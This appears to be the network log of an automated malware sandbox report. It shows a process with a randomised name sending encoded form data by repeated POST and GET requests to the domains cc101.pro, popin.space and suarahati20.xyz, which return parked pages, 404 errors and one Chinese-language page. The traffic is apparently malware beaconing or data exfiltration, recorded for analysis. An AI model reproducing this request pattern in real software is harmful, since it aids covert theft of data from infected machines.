                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:15:59.182904005 CEST | 469 | OUT | GET /ttiz/?Ux_TPFo=5F0OqyJMruXZK289rjd3t7SMD6PUxbvF7XqmY+a1kYOMou9z9S8lHT4vD/FoxHElV5ffXVI3IhvTCCTpyiSb8mZInZ+7lTNJSqYtQImnDDTI4Qo9BSGA+0x0XmeeIzyp/A==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.cc101.pro
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:16:01.205826044 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 25 Sep 2024 07:16:01 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Last-Modified: Wed, 18 Sep 2024 08:27:45 GMT
                                                              Vary: Accept-Encoding
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nwFP%2BLQrdQN0vhDHw%2BtKY43Cb6LxNDyYt36ZqjbBWyGErEiIJ0ysU9sqFn2idHmiEMB%2Fg%2B%2FSGwjaPPCwW%2BZqXGfM2xZVCmTaj30i%2B9Pr3SJGzSADmaAQ%2BA3kG1ONhrLt"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c8939e95ffd8ca5-EWR
                                                              Data Ascii: e6e<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"><title></title></head><body style="background: #e6eaeb;"><div style="position: relative;margin: 200px auto 0;padding: 0 0 22px;border-radius: 15px 15px 5px 5px;background: #fff;box-shadow: 10px 20px 20px rgba(101, 102, 103, .75);width:95%;max-width: 400px;color: #fff;text-align: center;"><canvas id="canvas" width="200" height="200" style="display:block;position:absolute;top:-100px;left:0;right:0;margin:0 auto;background:#fff;border-radius:50%;"></canvas><div style="color: #2
                                                              Sep 25, 2024 09:16:01.205859900 CEST | 224 | IN
                                                              Data Ascii: 42424;font-size: 28px;padding:111px 0 20px"></div><div style="margin: 25px 0 14px;color: #7b7b7b;font-size: 18px;">&#65;&#71;&#30452;&#33829;&#32;&#20449;&#35465;&#20445;&#35777;</div><a id="btn" h
                                                              Sep 25, 2024 09:16:01.205873013 CEST | 1236 | IN
                                                              Data Ascii: ref="javascript:void(0);" style="display: block;border-radius: 500px;background-color: #ff5656;height: 65px;line-height: 65px;width: 250px;color: #fff;font-size: 22px;text-decoration: none;letter-spacing: 2px;margin:20px auto;cursor:pointer;">
                                                              Sep 25, 2024 09:16:01.205887079 CEST | 1236 | IN
                                                              Data Ascii: ctx.stroke(); ctx.strokeStyle = "#00a2ff "; ctx.lineWidth = ras * 0.12; ctx.beginPath(); ctx.arc(0, 0, ras * 0.8, -Math.PI / 2, -Math.PI / 2 + index
                                                              Sep 25, 2024 09:16:01.205904961 CEST | 376 | IN
                                                              Data Ascii: } setTimeout(drawFrame, 20) } else if (index != 100) { index = 100; drawFrame() } else {


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              1 | 192.168.2.8 | 49714 | 199.59.243.227 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:16.317819118 CEST | 722 | OUT | POST /x7gz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.popin.space
                                                              Origin: http://www.popin.space
                                                              Referer: http://www.popin.space/x7gz/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=f07BeQ/6F/4ytyPc20ol9LhR/X00fFm8Bgz6VWazzi+JocAYNvyswNNgt4gwDyRZLlvg73p58kjuchWjcI5XaArUDYwtBX1mEcBxNSYl3y6fhJhcxnzfZrb1oZD0QPPbHK4IQHYFxc9Gm2qDkE03RqHW6nOaDQCrhuRXhxktDTgwHw9mw7C0K4oMKsrGbvqYyib7eXw=
                                                              Sep 25, 2024 09:16:16.779545069 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:16:16 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1110
                                                              x-request-id: dc9d5113-cb0f-47cf-a004-375787d10402
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                              set-cookie: parking_session=dc9d5113-cb0f-47cf-a004-375787d10402; expires=Wed, 25 Sep 2024 07:31:16 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:16:16.779567003 CEST | 563 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGM5ZDUxMTMtY2IwZi00N2NmLWEwMDQtMzc1Nzg3ZDEwNDAyIiwicGFnZV90aW1lIjoxNzI3MjQ4NT


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              2 | 192.168.2.8 | 49715 | 199.59.243.227 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:18.870013952 CEST | 742 | OUT | POST /x7gz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.popin.space
                                                              Origin: http://www.popin.space
                                                              Referer: http://www.popin.space/x7gz/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=f07BeQ/6F/4ysT/c0Vol7rhSjH00Vlm4Bn76VT6jzRaJr4IYMqGszNNg/Yg/NSRCLlze71958gLucjejcflUaQrSI4wvO31mEcBxNScL3zSfh5xcxDfcCLb2tpD0dvPfHK46QG1SxfFGm3aDkxA0K6HQ3HOISDrvhpdCr3sPIl42LmQMqZKyJ4AnKvDweY3woBLLAAnSBSf5kbm0jLN0ipUfKYXM
                                                              Sep 25, 2024 09:16:19.313280106 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:16:18 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1110
                                                              x-request-id: f34ca90e-a0ff-4f2a-8799-be873239d623
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                              set-cookie: parking_session=f34ca90e-a0ff-4f2a-8799-be873239d623; expires=Wed, 25 Sep 2024 07:31:19 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:16:19.313298941 CEST | 563 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjM0Y2E5MGUtYTBmZi00ZjJhLTg3OTktYmU4NzMyMzlkNjIzIiwicGFnZV90aW1lIjoxNzI3MjQ4NT


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              3 | 192.168.2.8 | 49716 | 199.59.243.227 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:21.419265032 CEST | 1759 | OUT | POST /x7gz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.popin.space
                                                              Origin: http://www.popin.space
                                                              Referer: http://www.popin.space/x7gz/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=f07BeQ/6F/4ysT/c0Vol7rhSjH00Vlm4Bn76VT6jzRSJrPIYNJusyNNgkYh4NSQYLl7k71xp8mPuTmSjN7RUVQrSHYwyBX0+EcRLNTsL3zSfh75c2XzcALb1oZD4QPP3HKwAQGAvyulGlXKD3Xc0XqHo0HPbSD3ghpp/r3w1Iic2PyR46resVJQgBNjLZoLx1CPjNinWK2/osIa0nqAw+9Y7be/GmyDihen6yDJxZYUhDS+b5RgOPo6zsHQN9/qhJYMTzU386Q+ZRXYKxOQRkTm4MXjrlSWMhabpPPODAooTco6esDt38PVqRyKl9qshfRqhwqt0ecFu17nKkVuZVmCX1tIZUcicr+5/gZpJ9ZYIlWMhKo7kFpRdJ80Ue2opAKceswW0mY0jJr3Zu142ier+FbqgFYgd106OG+36j8PG9BovMlQcEQu633gY39W6lc/d++xE5E0jeiSqbPunilDFMOd/nGDGnUqfgkI9Thae+sOsF09ckQJIqP2DVp0mIykkFmwLU7rWODICAY0fDLKaRd5sroOQlquwGoHtDAxVyx9BDugoR/AEgh/5D0LsRDOsxScz25LyEZRvItPDIysEai/AcEUPT3aRX73F0hs3+QtiD5ECY+ERiFNlXFmBQ6DBpyDWExDD6nXe0X9IL0ETZMGXpP1bF20fHczhp6qm7WMciIVyYckEW0sIZ5WohrSnChvTx2mr4Z4vP45RlPBoaLAlYIdQM9pJdchu5MDaYLbl1uz/FrSLuk6E4FZawYuF2cVEaZFoWXILJKmhorgtwFWvfOdWpjmZIMy3+ozQ6iVdM3wzAtnwjnG/+zY8VKehKevQx427OWnCVAzPJaxLmDRKRhXfgIgAyimuy9FAUbZnalEDob8JUItplaOVQrr+ys3g1S8lGU9Foy98ZjpsfNSsIjQjnHH985o7xAiZhIqtwOQ25qnQjh+hoGOz/iE1SgZOooewIa4vtEX72bXxi/NpA/exYDWb5G8G46m1 [TRUNCATED]
                                                              Sep 25, 2024 09:16:21.858835936 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:16:20 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1110
                                                              x-request-id: 2d6ce191-1ea0-4f8f-847a-b67e3c5f2a90
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                              set-cookie: parking_session=2d6ce191-1ea0-4f8f-847a-b67e3c5f2a90; expires=Wed, 25 Sep 2024 07:31:21 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:16:21.858859062 CEST | 563 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmQ2Y2UxOTEtMWVhMC00ZjhmLTg0N2EtYjY3ZTNjNWYyYTkwIiwicGFnZV90aW1lIjoxNzI3MjQ4NT


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              4 | 192.168.2.8 | 49717 | 199.59.243.227 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:23.964817047 CEST | 471 | OUT | GET /x7gz/?FvypB=88kTDXb8k4dH&Ux_TPFo=S2ThdnPEL+ISgmTm3B4s3uJcp0I5cmCvGyTPO0ydqwinms1NMbmy4dx/n743DQh1PnHu901crX3LUgGJDJcuYCXFMsY6FgwTNpVrSCEqyTejsoYQywqmfZ73r7v5CbykcA== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.popin.space
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:16:24.413008928 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              date: Wed, 25 Sep 2024 07:16:24 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1502
                                                              x-request-id: 20ad8616-28cf-4686-9934-198f634a9ab7
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NwZfCdFvCuH/zuHzLDEPLbeutYJLo7Ai1HPPWyZAsgQJpmmYNZZvuKlrDErbH2N/rCPZGp0pEFi9Q6oJt1rTcQ==
                                                              set-cookie: parking_session=20ad8616-28cf-4686-9934-198f634a9ab7; expires=Wed, 25 Sep 2024 07:31:24 GMT; path=/
                                                              connection: close
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_NwZfCdFvCuH/zuHzLDEPLbeutYJLo7Ai1HPPWyZAsgQJpmmYNZZvuKlrDErbH2N/rCPZGp0pEFi9Q6oJt1rTcQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                              Sep 25, 2024 09:16:24.413028002 CEST | 955 | IN
                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjBhZDg2MTYtMjhjZi00Njg2LTk5MzQtMTk4ZjYzNGE5YWI3IiwicGFnZV90aW1lIjoxNzI3MjQ4NT


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              5 | 192.168.2.8 | 49718 | 198.252.106.191 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:29.737099886 CEST | 734 | OUT | POST /tuad/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.suarahati20.xyz
                                                              Origin: http://www.suarahati20.xyz
                                                              Referer: http://www.suarahati20.xyz/tuad/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=PM5d+u7O9BccYHE/wJ/xbwur4k18xVV6BfeGbwvVe9YNmJqBiELabVlGCNMVYqZiLsC+lp1OQ9TThFquudYrCCQxldeEVyXQOaMnhCDZBx1UHOyFkO0cwOwrUlATY0bfS9RhV6goHT/3X+g9myRXtUTPuZbT3ZTjahfuFpgcwh0ZuAUZ6T4jSeA1RtGyGXPPFrRblQA=
                                                              Sep 25, 2024 09:16:30.318598986 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 796
                                                              date: Wed, 25 Sep 2024 07:16:30 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              6 | 192.168.2.8 | 49719 | 198.252.106.191 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:32.276554108 CEST | 754 | OUT | POST /tuad/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.suarahati20.xyz
                                                              Origin: http://www.suarahati20.xyz
                                                              Referer: http://www.suarahati20.xyz/tuad/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=PM5d+u7O9BccCm0/2uTxdQuqzE18mFVmBfCGbwHFfO8NmoaBlAfaX1lGNtMQcqZlLsHelpJOQ9XThAWuvq00ECQz8NeaWCXQOaMnhB+2B1ZUE76Fkv0Dv+wscFATSUaWS9RTV79zHVj3X849mjRYkUTJxJac2ZmfAGnICpoI4HoUiW5zgxwlReoeRuuEDgSnfIBr7HUxqZUGb4ibTu7TexnZ3+DO
                                                              Sep 25, 2024 09:16:32.849601030 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 796
                                                              date: Wed, 25 Sep 2024 07:16:32 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              7 | 192.168.2.8 | 49720 | 198.252.106.191 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:34.821712017 CEST | 1771 | OUT | POST /tuad/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.suarahati20.xyz
                                                              Origin: http://www.suarahati20.xyz
                                                              Referer: http://www.suarahati20.xyz/tuad/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=PM5d+u7O9BccCm0/2uTxdQuqzE18mFVmBfCGbwHFfO0NmeuBjhfaW1lGANMRcqZ4Ls/BlpF4Q/fTjiuum+g0RyQzhdebVyXBOb8jhCG2B1ZUE6KF0u0Dp+wrUlAXY0a+S50mV4QGEjT3Xco9kR5YrUTLyJbD2Z66AGTuCosi4AEUhhMu9SJ7EPg8KeSOajjCerR/nQwz8cdtapmhXoLGBU7237i6BZSa+eaggX0vixT/NmUmDBND1AWqqOFxFh4rq4Q5+TmRStxzk3MaX6TvTRTP825uRM7f7FLMHUgTHZmxmMpzLhv7Uq0C4b/AGdlA1OeOIki8WpHrtE5Kq6r0qvlpyQoyLO4lccrTVYUmnOGvGq37OAWgQ3LoFJdi4ZEhW7zrkL+/mL6o63+nqVNQTEwTgU27DFiBgpYQqxTbxBAA7aUldbiSE/M073GadDeVkyZFG7pPie4TD3l50+VoVHBJ9aWdyKKgqR1fxzo1BEJzq2MxCuLEqNEjNw2YTniOLtzBZV0ZBm6bhxNtUVeerAPqvobcY92Ld4ID4bXH/eIB/IGwdSnMgcuu1hM8P1aWllCpyygILMi9fIJvOrQ/ScoWUijDRtPRjpuBORghkPnIIc+tIf0fmJraCmLulGTnVkF3i+wUZskSAnBFiTXSEbf7P6jede9UzsgKKFyoIjpT6s7L5TSsl8F02HKj2wWaqWJ4MDEWv/OFaO2LL60YUiO9zBLGPy7UAZ2dW/oiC9aI521Nx/F+fINtltSgLLt9qIx21Yc7lp5o957OPj21TUiG4vEvFEPSz+Q4IXpv7Rwq1UA7TMZGttRu5En2BPgDrHOsCYmEzs5xmchxWVCkeugHzrL9iM5CbdpNiRrqEd7bBjcrzDjHZ9jPjllmdPnA52jxAXkhoTMU4Bzc/qxh6OqVLT2L1+eRQQt+Iq36dwrdoBY7fWwoXJ0OSAmkL9t39VJeoQj9TGg84tN+uaLS4uBKFS2rRNpiZY6CncBOs1yE [TRUNCATED]
                                                              Sep 25, 2024 09:16:35.391519070 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 796
                                                              date: Wed, 25 Sep 2024 07:16:35 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              8 | 192.168.2.8 | 49722 | 198.252.106.191 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:16:37.395792961 CEST | 475 | OUT | GET /tuad/?Ux_TPFo=COR99YL4ij4WSzIn9uKNQTj+/nF71npMJ8PUbDDmK/MOrLSwhgHAUUFmM9ZFV75zOrifp59AeN3Qrz+fk81rYB1Esp+MUB3RCvU15TDIEUASO5KKoulUwcQsQXQ4LVDRNA==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.suarahati20.xyz
                                                              Connection: close
